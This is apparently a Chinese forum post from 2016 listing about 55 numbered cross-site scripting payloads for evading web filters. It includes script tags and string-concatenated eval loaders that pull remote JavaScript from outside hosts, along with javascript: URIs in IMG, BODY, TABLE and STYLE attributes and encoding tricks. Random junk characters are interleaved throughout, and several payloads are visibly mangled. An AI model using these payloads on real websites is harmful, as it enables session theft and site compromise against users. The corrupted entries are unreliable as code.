(1)普通的XSS JavaScript注入/ f4 i0 Y0 j7 v- `
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>+ g, H4 `' ]6 g2 I
(99)另类弹框
2 X. {3 j7 N: V<q/oncut=alert()>1
* _: \4 A7 O' r- o<s/onclick=alert()>b4 L! j- M3 q7 d* g; ?
<XSS=" onclick="alert(1)//">clickme</SSX=">
8 M8 A9 I/ v" w <zzz onclick=alert`1`>clickme</zzz>
! y" {8 d6 L( Y. u9 J; u+ T( J: }" N4 y <a onclick=alert`1`>clickme</a>' Y3 |: g8 ~% u6 ~+ [
<a=">clickme</a=">! b; J1 H8 R7 a( z3 e0 ?& l
<a=">clickme</a>* Z! j/ i" K$ h/ @- k; Y9 o
<z=">clickme</z=">
; \. d" y/ u. d<z onclick=alert`1`>clickme</z>& l3 X- @# ?0 e+ u* T
* B- x$ F' y3 c. [2 q1 Y# D# Q(2)IMG标签XSS使用JavaScript命令
* A5 s" O5 F3 O- s<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>, v# v+ q# W- [4 Z2 _
! M- H( k4 q+ A# U6 z(3)IMG标签无分号无引号$ u" T* _" W8 V6 ]* m
<IMG SRC=javascript:alert(‘XSS’)>+ t1 A( u2 G- |- Q
" D4 k( _3 s. O. b& Y! E
(4)IMG标签大小写不敏感
9 @; ?$ m1 S# _6 B7 V* R, c% @<IMG SRC=JaVaScRiPt:alert(‘XSS’)>1 j" ^) W6 `" R9 s
& \0 C& c4 o" Y* E) Q5 t, N(5)HTML编码(必须有分号)
- N; w ?% Z$ H) c$ _5 W, r% V/ b1 |<IMG SRC=javascript:alert(“XSS”)>. @: e7 ~1 C' d% S, f" M
% O* u0 `) `0 c: J9 R. _" u
(6)修正缺陷IMG标签" b9 I6 P {* ]* ~& H. I0 B
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
7 h/ a% p+ m4 g0 _3 f Y$ `2 R6 ?4 @* v8 i
(7)formCharCode标签(计算器)
7 C2 Q4 f0 |0 c4 i; J* {<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
; `9 B+ ^( r! _$ f
}. ~8 @4 w0 l( h+ \% w& u6 T(8)UTF-8的Unicode编码(计算器)
; W: K. \ B5 X<IMG SRC=jav..省略..S')>. B% ]( B, W2 M
5 U7 H2 X* N) Z. T2 r* G2 ~(9)7位的UTF-8的Unicode编码是没有分号的(计算器)5 m# U( ^% U/ M. |; B+ [
<IMG SRC=jav..省略..S')>
7 S( P6 R3 @3 ~0 t
( x& U6 |8 U. q6 o(10)十六进制编码也是没有分号(计算器), h3 Q& Z e( {, \6 V, t* U+ ? g
<IMG SRC=\'#\'" /span>* f! x* E. ^2 a6 M3 ]7 D
1 X2 D7 L; F& w }: i(11)嵌入式标签,将Javascript分开
6 [8 ?# O, O$ G! v# T) E<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>5 z5 f; T4 { @8 L, A" Z. s
6 F- O2 A! o( X8 R3 T& C3 z
(12)嵌入式编码标签,将Javascript分开. b- h# {& G$ p, T
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
1 c+ y8 q) o) J0 z4 f
; k$ n3 \/ n6 e U$ T" M/ c(13)嵌入式换行符
. v) U q" u8 a: B5 G+ M1 [6 x- L<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>3 r& Z; Y- {8 R+ U+ v" P
2 Q# E$ C$ S* U" N* X. ?
(14)嵌入式回车
( L0 e8 Y$ t( A9 ~* f0 s) Y0 H<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>5 D& C/ `( N Q! a
7 A5 c% M+ Q; M
(15)嵌入式多行注入JavaScript,这是XSS极端的例子0 s- f- W5 m Y/ O+ v
<IMG SRC=\'#\'" /span>& W# ?6 G0 F( R W5 N
) J% P7 K; I: Y1 ]3 `. _
(16)解决限制字符(要求同页面)
3 C8 Z! _ C8 v# R/ O3 b+ T<script>z=’document.’</script>
* a+ A ]5 u2 ]) s& F<script>z=z+’write(“‘</script>
5 }9 P6 k, y" p4 }/ B0 V# I<script>z=z+’<script’</script>
% Z b% N1 i$ ~3 Y7 @<script>z=z+’ src=ht’</script>% Y! v- G2 G" R; E
<script>z=z+’tp://ww’</script>
Y7 b/ s5 j' c) W, u( `+ D<script>z=z+’w.shell’</script>
+ e0 P& Y0 p" Y1 c& L0 p<script>z=z+’.net/1.’</script>7 i1 W# {) O3 b' {5 f6 S/ }$ ?
<script>z=z+’js></sc’</script>
! y0 K, [3 Q. v; K( c; J2 z x<script>z=z+’ript>”)’</script>
! b0 S3 {- a' Z) [<script>eval_r(z)</script>6 m' P8 l& n, M J) P
) l6 e4 k- s! d& D- _: v' e
(17)空字符
2 }7 ~! }$ D$ S* \+ T$ Uperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out7 }: {7 q- O" }( A/ `3 `
7 O$ k# e% |2 |3 @4 L: Z) F(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
: X3 i, g8 n& \! t& L. Jperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
4 S# `0 Z( v7 b/ w" \8 ?1 ]; X6 m/ r9 L2 b( O# Y3 \- \7 J/ {
(19)Spaces和meta前的IMG标签9 B' Q) d# R( ]) }, P
<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”>
) s( s, A4 ~+ \; M' y. G& [( S) \
7 @7 d8 R9 @) Q- G! e(20)Non-alpha-non-digit XSS
9 p( G. J; l( n8 u2 l- n<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
! y6 [5 V% D6 p
0 V% R$ i4 B# I$ C(21)Non-alpha-non-digit XSS to 2
% ?. h* R2 x3 B<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
( `# T- L+ ?6 Y" q9 l
! O, O* L7 Z& Z! W6 {( b(22)Non-alpha-non-digit XSS to 3 A) f& [& @" W5 i
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
5 [( v5 \% a2 ~" Y0 x% W& ?. q) }& ]2 g/ @( F/ K) }
(23)双开括号
% j9 r, i6 N" {* G. v2 P<<SCRIPT>alert(“XSS”);//<</SCRIPT>7 |4 h4 F' p3 |4 M7 V& y
0 N8 F& l7 N8 ]
(24)无结束脚本标记(仅火狐等浏览器)
. \ C2 S# p7 x' g<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
! G/ ?* G) s6 z* f7 `! q4 J
9 b0 n3 Y1 D% O(25)无结束脚本标记23 M" U3 y, h2 A& U" C
<SCRIPT SRC=//3w.org/XSS/xss.js>
3 H8 r- ^8 A) ], u# K, f/ W. n5 z
0 J" {) E4 a* n7 N O% U( c6 G(26)半开的HTML/JavaScript XSS, G4 Y/ R( B- j, i
<IMG SRC=\'#\'" /span>
2 L/ ]+ ~; q8 ~' Q0 F) v0 y
6 c+ M/ m4 L+ r6 {' P: g# o! p(27)双开角括号4 t9 J: Z! f/ E, U4 ]$ _( E
<iframe src=http://3w.org/XSS.html <
8 F9 Z; H1 ?1 i- a+ y
4 ?& X' I6 W1 n. Q1 s(28)无单引号 双引号 分号; u" Z4 ^+ j; ~$ o1 k* R- E
<SCRIPT>a=/XSS/
9 ?; t/ P* g; }, Ealert(a.source)</SCRIPT>9 E4 d1 r- h3 Q7 u4 v3 z; T
; G: k4 t7 U ?(29)换码过滤的JavaScript
7 l9 i4 R1 v z& p7 e& `\”;alert(‘XSS’);//; L4 C) f) h, g) W- [, [2 C
- ^% T3 w* Q8 ]
(30)结束Title标签
$ ~* B9 ?" x2 P6 A6 p0 _</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>5 N r# L6 O9 C, G7 }
9 H2 l* T [& |- R$ \
(31)Input Image
2 I+ t$ g Q/ }% |+ k |<INPUT SRC=\'#\'" /span>" O% C7 g7 X1 N( F: g. g S
' o* T" i6 N: s3 }! }" `(32)BODY Image
# L$ g% @1 Y3 k& c$ R% W<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
# v, W+ \( a4 T; M) w
$ x, `' l7 Y0 M8 N& R0 f(33)BODY标签8 c9 }# v& b; I
<BODY(‘XSS’)>$ k! F. ?' W; x! v6 S4 ]8 a1 ]/ V
' ]/ E& q% q* @. {* v
(34)IMG Dynsrc# N; [9 o$ e s2 V) b5 M5 |- e
<IMG DYNSRC=\'#\'" /span>
, B- G( c- d: v- p7 k- F
' H1 ]# r* t, p9 z, j(35)IMG Lowsrc
! M! S" e3 E5 p1 E& N8 ], X<IMG LOWSRC=\'#\'" /span>
3 h2 B$ F7 d4 {6 F, u8 I( {* R9 l6 D7 F/ V& z$ U, G- S
(36)BGSOUND
$ j$ f+ L3 {& F( A% `- x+ q7 m% q1 Z& O<BGSOUND SRC=\'#\'" /span>/ `4 [* H6 v9 Y( j3 T( z
8 T7 m! n+ [3 r' s5 z, K(37)STYLE sheet% Q( ~& j; T% @; M; [' J3 L; |
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>0 q) E$ h( R6 [1 q' d/ E
) z. V+ C0 u/ V7 d% u+ R5 u! A(38)远程样式表7 k2 p; v3 I$ E5 b
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
a2 X6 f* [2 Y$ v2 c( c" K
, D: J' Z6 H2 N! q1 u(39)List-style-image(列表式)
- u6 z1 `# M+ K& z<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS, [, w9 W9 ^& H# L, {4 t* r
! Q/ |1 }4 h: {$ b; u/ h) K1 ~3 K: D
(40)IMG VBscript
' L0 h6 C H' M9 c. g) G I7 M<IMG SRC=\'#\'" /STYLE><UL><LI>XSS
: l% |5 W' a# W3 [9 U4 A; o9 c) V$ F% O* N8 z6 C
(41)META链接url
; a, `2 `5 k+ a2 X) O<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>1 W k2 |3 `3 k! s/ k. }# e
0 m: B: Y1 ] n: N) I( [(42)Iframe
: E% e1 G% i3 V0 S7 C" b<IFRAME SRC=\'#\'" /IFRAME>( e6 u+ ~$ ^) @7 K6 {
5 k$ m+ _9 L! z9 w* U" d# H8 j(43)Frame" G. o; l# R H# |, n' O, ?
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>
7 G- f+ g& _& _ ^2 Y/ |: f+ s" h: _+ k/ Y, m8 X
(44)Table" I4 q' x9 y3 `. X2 y9 C0 X4 f1 M
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>) K$ ]$ h' Z$ c, R% c9 n
) h9 K% h' U8 ^0 L r0 w8 }; M& ?
(45)TD
8 `5 V5 p' J% Q( E1 j- o: c<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>5 y; {: f: Z. A, w: Z/ G
% [. a$ V l, y4 ]- w
(46)DIV background-image
7 |+ d" X: T9 y+ L' b<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
7 O5 x! ~$ ^) f) b# X+ Z8 l/ F) [' l: z! c# B
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
& i) V: D+ Q; ~<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
" h/ k9 T7 `, [8 e8 B
3 T* f# y* {8 X8 T; K' n" h(48)DIV expression+ d% e4 o. c- y& H/ q( ?- `
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
1 n$ j* M) r: y% O4 g8 d# _ A/ }- f: T/ S0 d1 Q
(49)STYLE属性分拆表达
2 U. d2 @; {) M<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
! V4 F; }$ ~- A* j# i6 I
" a) B. D( C% s ^1 e(50)匿名STYLE(组成:开角号和一个字母开头)
5 S3 `8 b8 @% a; E1 q<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>3 f' ]' M2 D' E# K" ]
8 n# V3 J8 y3 U; t- s7 l: R(51)STYLE background-image
9 s: w8 Z3 a5 H<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
1 h9 P2 U0 m2 p2 `6 e# s3 G* m. l. x& O5 l" Y3 m' d
(52)IMG STYLE方式
, [" S* o9 K' \: Yexppression(alert(“XSS”))’>
3 D% ?# @% I' o' }4 @* e& H& Z: G2 @9 C/ ~" _2 }0 `
(53)STYLE background
. I& M6 p; b* j<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE> u8 I, D. J# R# `
- `* w' d" s6 B' o6 p# \5 ]7 q% s(54)BASE
/ U! j0 J" R/ z: d7 Q$ k" B1 d<BASE HREF=”javascript:alert(‘XSS’);//”>
/ u% T6 g+ \' O5 s! M8 L/ V, U. S1 b: b7 Q% d( D7 G6 k: X
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS, ], _+ m! |/ P$ _! \# ~0 k
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>
6 ^" o8 ?! n9 C# b/ a+ a9 X4 }$ @ |
发表于 2016-4-28 10:06:15
收藏
支持
反对